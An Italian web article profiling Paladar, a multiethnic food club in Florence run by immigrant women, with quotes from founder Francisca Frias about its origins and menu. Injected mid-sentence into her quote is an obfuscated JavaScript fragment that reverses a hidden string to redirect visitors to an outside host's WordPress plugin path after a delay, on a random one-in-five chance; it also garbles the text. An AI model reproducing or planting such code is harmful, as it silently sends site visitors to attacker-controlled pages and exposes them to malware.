Paladar, viaggiare mangiando

image_pdfimage_print

Gusto, sapore: è questo il significato della parola spagnola paladar, che ha dato il nome al circolo gastronomico multietnico inaugurato da poco in via Pistoiese 315 a Firenze.
Ed effettivamente è proprio il sapore di terre lontane che ci fanno rievocare i piatti e le atmosfere di questo locale, nato dalla passione di cinque donne, che grazie anche all’associazione Nosotras – creata a Firenze nell’aprile 1998, riunisce donne di 15 paesi diversi e ha tra le sue finalità combattere il razzismo, valorizzare la soggettività e le competenze individuali delle immigrate – si sono incontrate e hanno sviluppato il progetto Paladar.
Francisca Frias vive a Firenze da 15 anni, poco più che ventenne ha lasciato Santo Domingo con una laurea in psicologia in tasca ed è venuta in Italia: “inizialmente ho lavorato con ragazzi disabili, ho pulito case e fatto mille altri mestieri, poi grazie all’associazione Nosotras ho incontrato altre donne che come me facevano un lavoro che non le soddisfaceva… Così abbiamo pensato a ciò ci piaceva fare ed è venuto fuori che tutte, esclusa me, avevano la passione per la cucina. Nel 1997 abbiamo iniziato a sperimentarci nel catering aprendo Las Delicias, io occup (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andomi dell’organizzazione e le altre lavorando ai fornelli. Con il tempo e unendo le forze abbiamo iniziato a specializzarci in ristorazione… ci siamo occupate della gestione del ristorante multietnico della Festa dell’Unità di Firenze e dell’organizzazione, su incarico del Comune di Firenze, delle edizioni 2002 e 2003 del “Cous cous in piazza”: un vero successo, entrambi gli anni abbiamo portato più di 10 mila persone in Santissima Annunziata! Forti di queste esperienze abbiamo deciso di partecipare al concorso per nuove idee imprenditoriali del Comune presentando il progetto Paladar”.
“Il nostro motto – racconta Francisca – è “il mondo in un piatto”: oltre al cibo cerchiamo di offrire ai nostri clienti un po’ di cultura, quasi un tuffo nei nostri paesi di origine. Infatti tutti i piatti, latino-americani, africani e asiatici, sono preparati da persone che provengono da quei paesi, proprio per cercare di portare più sapori e sensazioni possibili a coloro che vengono a trovarci. Il menù varia quasi settimanalmente e include empanadas, arepas, kibbi (dal Brasile), pastelitos, baja (dalla Somalia), falafel, cous-cous, tajin (uno spezzatino marocchino di carne di manzo con pane arabo, verdure e frutta secca caramellata), pollo al curry, moro (piatto tipico di Santo Domingo) e tante altre prelibatezze, oltre a vini e cocktail provenienti da varie parti del mondo.”
Intorno al Paladar e al servizio catering Las Delicias lavorano circa 20 donne, italiane e straniere, ognuna con una storia, una cultura diversa ma con la voglia di far rivivere qua a Firenze un po’ delle loro terre, delle loro tradizione. E cosa c’è di meglio di un vero e proprio assaggio per conoscere o riscoprire un paese lontano, per entrare in contatto con un’altra cultura? È questo che ci propongono Francisca e le sue colleghe: un viaggio nel gusto a pochi metri da casa.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *